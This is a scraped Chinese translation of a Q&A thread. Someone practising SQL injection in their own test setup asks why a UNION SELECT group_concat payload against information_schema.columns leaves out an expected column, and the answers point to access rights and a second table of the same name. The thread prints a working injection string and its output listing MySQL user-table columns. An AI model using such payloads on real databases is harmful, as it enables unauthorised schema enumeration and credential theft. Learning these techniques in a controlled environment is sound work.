繁体 English 中英

SQL注入group_concat

[英]Sql Injection group_concat

原文 2012-10-25 13:57:51 3 2 mysql/ sql-injection

我正在为个人教育开发一些SQLi，但我一直遇到相同的问题。

当我使用以下注射剂时

bla' union all select '1', group_concat(column_name),'3','4' FROM information_schema.columns WHERE table_name= CHAR(117, 115, 101,114) #

我得到了名为user->的表的所有列名

Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,Repl_client_priv,Create_view_priv,Show_view_priv,Create_routin

而且因为这是我自己的受控环境，所以我知道该表包含一个名为UserName的列。 为什么它没有与列结果一起列出？

2 个解决方案

那应该工作。 您可能会检查正在执行查询的帐户是否有权访问UserName列。 http://dev.mysql.com/doc/refman/5.0/en/information-schema.html建议您仅看到有权访问的列。

答案：还有一个叫用户的表，但我没有在要搜索的table_scheme中指定

带GROUP_CONCAT的sql

[英]sql with GROUP_CONCAT

[英]SQL group_CONCAT

SQL 使用 group_concat

[英]SQL Using group_concat

sql group_concat和子查询

[英]sql group_concat and subquery

sql group_concat失败

[英]sql group_concat fizzle

SQL帮助〜GROUP_CONCAT

[英]SQL Help ~ GROUP_CONCAT

用HAVING，GROUP BY和GROUP_CONCAT计算SQL

[英]Count SQL with HAVING, GROUP BY and GROUP_CONCAT

SQL GROUP_CONCAT无法与2个表联接一起使用

[英]SQL GROUP_CONCAT not working with 2 table join

WHERE中的SQL GROUP_CONCAT别名

[英]SQL GROUP_CONCAT alias in WHERE

在 MySQL 上优化 SQL 中的 GROUP_CONCAT

[英]Optimize GROUP_CONCAT in SQL on MySQL

暂无

暂无

声明:本站的技术帖子网页，遵循CC BY-SA 4.0协议，如果您需要转载，请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.

相关问题 带GROUP_CONCAT的sql SQL组_CONCAT SQL 使用 group_concat sql group_concat和子查询 sql group_concat失败 SQL帮助〜GROUP_CONCAT 用HAVING，GROUP BY和GROUP_CONCAT计算SQL SQL GROUP_CONCAT无法与2个表联接一起使用 WHERE中的SQL GROUP_CONCAT别名在 MySQL 上优化 SQL 中的 GROUP_CONCAT

相关标签

粤ICP备18138465号 © 2020-2024 STACKOOM.COM